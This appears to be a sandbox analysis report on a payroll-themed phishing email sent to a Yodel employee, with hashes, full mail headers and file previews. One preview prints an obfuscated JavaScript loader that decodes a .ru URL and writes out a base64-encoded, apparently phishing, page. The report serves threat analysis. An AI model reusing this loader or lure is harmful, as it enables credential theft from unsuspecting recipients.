                                                  Preview:<script>.ghWsZePoEP = atob("aHR0cHM6Ly9HUy5udGhlY2F0ZXBpLnJ1L2J0YjFLaFdnLw==");.hsXfXravTi = atob("bm9tYXRjaA==");.esiJkVhktD = atob("d3JpdGU=");.if(ghWsZePoEP == hsXfXravTi){.document[esiJkVhktD](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IERWTFNCUEd4TEggPSB7CiAgZ2V0KFVSaktCaFhRckUsIGpKbG90VmpkeVIpIHsKICAgIGNvbnN0IHdQVHlyRUlJTXIgPSBbLi4uakpsb3RWamR5Ul0KICAgICAgLm1hcChGaGdXb0dXRFZ3ID0+ICsoJ+++oCcgPiBGaGdXb0dXRFZ3KSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3Qgem9tTVVTdk9VWCA9IHdQVHlyRUlJTXIucmVwbGFjZSgvLns4fS9nLCB1THVTdUF
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:downloaded
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  File type:RFC 822 mail, ASCII text, with very long lines (327), with CRLF line terminators
                                                  Entropy (8bit):6.171876514608292
                                                  TrID:
                                                  • E-Mail message (Var. 5) (54515/1) 100.00%
                                                  File name:f64da42c-e9a8-a0ac-437d-d14377da4643.eml
                                                  File size:108'732 bytes
                                                  MD5:72d477110463da85c47b6a3d7a6bcb5f
                                                  SHA1:b406c919997c8ce218ce73c6c03728445924ef64
                                                  SHA256:42c140d453c2715598c974b451b051b8299f57b9889331251399723408a95c68
                                                  SHA512:e5937182b99c76b9d51c4e8f8ff23c47bbd310415f8ebf54e272ee3b60ca130416d010b39d6a005fd76cbcb3f434420b67cefa0555adfefad70fb3858e897e8b
                                                  SSDEEP:1536:m7p4n3DU8tNkmeTQXOWqf0czLGgz7EveCbsjkHYk31sUqA9t0VCSCGG9abmVv3K6:mgRX7qffLGC7KbtRr0VC4DbmZgM
                                                  TLSH:23B3B07E2FAA05B1CE4132EE0D01BC1B6DB51EB7A87350E23E740E62588F9D94F5254B
                                                  File Content Preview:Received: from AS2PR05MB10710.eurprd05.prod.outlook.com.. (2603:10a6:20b:649::10) by PAXPR05MB9640.eurprd05.prod.outlook.com with.. HTTPS; Sat, 15 Mar 2025 14:52:30 +0000..Received: from DU7P190CA0012.EURP190.PROD.OUTLOOK.COM (2603:10a6:10:550::11).. by A
                                                  Subject: Yodel Co. - Payroll Processing Completed Saturday, March 15, 2025 11:52:16 PM, REF ID-MNBVCXZ
                                                  From:Noreply <muro.kenji@garde-intl.com>
                                                  To:terry.tuttle@yodel.co.uk
                                                  Cc:
                                                  BCC:
                                                  Date:Sat, 15 Mar 2025 14:52:24 +0000
                                                  Communications:
                                                  • [You don't often get email from muro.kenji@garde-intl.com. Learn why this is important at https://aka.ms/LearnAboutSenderIdentification ] [CAUTION] This email originated outside of our organisation. Be cautious of opening any links or file attachments
                                                  Attachments:
                                                  Key Value
                                                  Receivedfrom unknown (HELO 52597.ip-ptr.tech) (muro.kenji@garde-intl.com@147.45.49.87) by 0 with SMTP; 15 Mar 2025 23:52:24 +0900
                                                  Authentication-Resultsspf=pass (sender IP is 27.34.154.55) smtp.mailfrom=garde-intl.com; dkim=none (message not signed) header.d=none;dmarc=bestguesspass action=none header.from=garde-intl.com;compauth=pass reason=109
                                                  Received-SPFPass (protection.outlook.com: domain of garde-intl.com designates 27.34.154.55 as permitted sender) receiver=protection.outlook.com; client-ip=27.34.154.55; helo=garde-intl.com; pr=C
                                                  X-User-AgentMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  X-Accept-Languageen-us, en
                                                  X-MailerRoundcube Webmail
                                                  X-Reply-Toreply-to-email@ap.com
                                                  X-DateSat, 15 Mar 2025 14:52:24 GMT
                                                  FromNoreply <muro.kenji@garde-intl.com>
                                                  Toterry.tuttle@yodel.co.uk
                                                  Subject Yodel Co. - Payroll Processing Completed Saturday, March 15, 2025 11:52:16 PM, REF ID-MNBVCXZ
                                                  Message-ID<288c32e7-238a-e1d9-3b66-5e4d20c3ff5a@garde-intl.com>
                                                  DateSat, 15 Mar 2025 14:52:24 +0000
                                                  Return-Pathmuro.kenji@garde-intl.com
                                                  X-EOPAttributedMessage0
                                                  X-EOPTenantAttributedMessage43de160c-6e69-45b2-a9cd-7e215970887d:0
                                                  X-MS-PublicTrafficTypeEmail
                                                  X-MS-TrafficTypeDiagnosticDB1PEPF000509FA:EE_|AS2PR05MB10710:EE_|PAXPR05MB9640:EE_
                                                  X-MS-Office365-Filtering-Correlation-Ide0ec0015-cd87-4847-11ba-08dd63d100b0
                                                  X-MS-Exchange-AtpMessagePropertiesSA|SL
                                                  Content-Typemultipart/mixed; boundary="_d3e9ceb2-4166-4248-9591-5f1196cd881b_"
                                                  X-Microsoft-AntispamBCL:0;ARA:13230040|4053099003|43540500003;
                                                  X-Forefront-Antispam-ReportCIP:27.34.154.55;CTRY:JP;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:garde-intl.com;PTR:ybxxqa55.secure.ne.jp;CAT:NONE;SFTY:9.25;SFS:(13230040)(4053099003)(43540500003);DIR:INB;SFTY:9.25;
                                                  X-MS-Exchange-CrossTenant-OriginalArrivalTime15 Mar 2025 14:52:25.9675 (UTC)
                                                  X-MS-Exchange-CrossTenant-Network-Message-Ide0ec0015-cd87-4847-11ba-08dd63d100b0
                                                  X-MS-Exchange-CrossTenant-Id43de160c-6e69-45b2-a9cd-7e215970887d
                                                  X-MS-Exchange-CrossTenant-AuthSourceDB1PEPF000509FA.eurprd03.prod.outlook.com
                                                  X-MS-Exchange-CrossTenant-AuthAsAnonymous
                                                  X-MS-Exchange-CrossTenant-FromEntityHeaderInternet
                                                  X-MS-Exchange-Transport-CrossTenantHeadersStampedAS2PR05MB10710
                                                  X-MS-Exchange-Transport-EndToEndLatency00:00:04.4948785
                                                  X-MS-Exchange-Processed-By-BccFoldering15.20.8534.017
                                                  X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910005)(944506478)(944626604)(4710137)(4712020)(920097)(930097)(140003)(1420198);
                                                  X-Microsoft-Antispam-Message-Infodl7UDBVK9RfcFzqlnIuSFW3H6AONz4Ye9g6rEmm3olkcqvUvuZ8YSRNGLBlWZsDbuO0x2J8iHHLQF4bQ4F4H1MwOv08mvcoI2FwONsXJ2pUcKlef5+15wv0A24rZJUBN/mRe1Ix2M/YeAVq6yc0r8CViNYE7wp1oYdli3DTgh6s9SqMVqvRyIJSvpvPbhVLdBghLVvBKjj7wqYYPV/G9WoA6FSBx820Pdb4Cdi0B2Utgv6rONGT7Fztlp4eExc3Dh4+dptTFO4jOruFD+xSmTWiPOYcI9A+e5mI0R/yX/YkCDcNnuo+odEwUIBxfjHMRQ4AB7r7keZoWmPH8tUJ7pbjsGXUHPOtXDKuqz3MXYbu65goT9eMgrgA6347Vd38MaECj/6xdoXFRKvwU+PSPq+eg5wG5n2pQxc1fS3rbbzU81GRASbTwBVrHz3gtkLuzZNSrKZdbliQ8skEXh/YBU29aQdxdfyL4P26LrNhbMZ4y5FkFyMnTLHYrjY5e8IGK2Kn0Q0n0DNsvRkQ+iV6/nIOMDrnXNaz1XtS+pp3GQRrygD1t9QldsxAmK2YZbkZlMQWvv0ivumtIW5c4iitqgmJhiRwa3DQtLovEu7e9qNzRX52uxpEt1GcyAYwX9zWEL0TKwbuldG6x1McHLHJT+RUo6iywkAg4PUE2vF/79POT3X9raEn2MS2qxoEf6glcluS4G1oQhN+8Zyi8e+i9E8jq+ROrKMmEFziFrULckEXkhGXS1roB2kDKCKjUSQ4aHaQFG67d6M9o78iTnOEHR2c+S/K2BqxIlHtfFpey+bqwzuxCDCQaiJRVnIbJ9gyUC+hcLuRQScUJk2nRAzGS6uShEhfex9W5ZSYVMiW3f9Yh693WdfcWICnu+E1nigjx1WEN1YfNazZtjGvXDVEllzaFmdyntHHw0w81UPtJAV674Cmj0FVR6cudfDgs5jpmw4qiRZnUZdN8CQhkrfXes3hHdDodQcFaYmVMPlgPR4vBWu519NE7xKI7mknp6SyEtYcPy9W4pQd+RxDiU5ERjOUi2AePaR1u/af+PYEasyoazu2pbZIdb/AqaqUJEvstjP/Ccu6hcjd/deqX9HklOkQ4qnAQFZWTujcSP/R9lWSUklUCwFEeB5P64lMWdeio48stIEz9MOx9qm5rDoMoQSvmzWJGj6Zh9DDEFZpMU9Ub6PDXUuFgwRxPoHu/ylbGdqkgsce11bXQf4XUhgJxKeRBpT8R5kmnetmGJUuFpC6rkJWARcpEpauiC/yN73XFFMGRXJFHj8HWfXNtFyug+vnFV+mc+5z4zIWYKmLoq26FqdjT80h/yO7JyiCd3zOUUsyn9isFw8MrTKj7q77zLFrHuR7/TG7q7ZKZ2/PxpqmtEtxC+uXYksLgs/fn+M4UKtVLecbhQWYR7QouOdTfMX/aYs1fq9wXBHFjKHN9Ca+x6W77y8mejWg/CK8H2uYg6dv6aGm5ldU+GZN+56f1CCeguK8syPABQaD8sVzHs4/CH5GQL4+LXyWnlS0mU9mZQpII340bZbS2MRqn9SuuXZWNMbBywoqqo3nulzDk07ZWRPhIurjkZMllU5+nPtSrmWjMWyrr2DKT87BB+jzjc30vg3tQkXl9v91zY1YqpwE6sQN1SF1LSYLt3am3YYQutoHRMb/ECK1Mj4wtNcJiRey7QV5gvv1jOVsKkhCuxIiDypqdw2E9MKWKjc1KShPQbHNeaj/1//YcxGVfQ4SJu2AYKyYoGWEk9TQ9u4OuvDvfMzUyBj6bit/7QlQ698+i0oQngC1yh9CfGtAJaGqT6FA5Ldgo9Rbu4f1DeX1+yelcWz/FCpDPTzs5maaVU+eq4ZYIZSOjofdPsegpAzFcNLdOBUMml/E9YbbI169eP0x9h95hGrKdU/xD9sa5/DjBRjXzft15qvE+QazsON3pxA==
                                                  MIME-Version1.0

                                                  Icon Hash:46070c0a8e0c67d6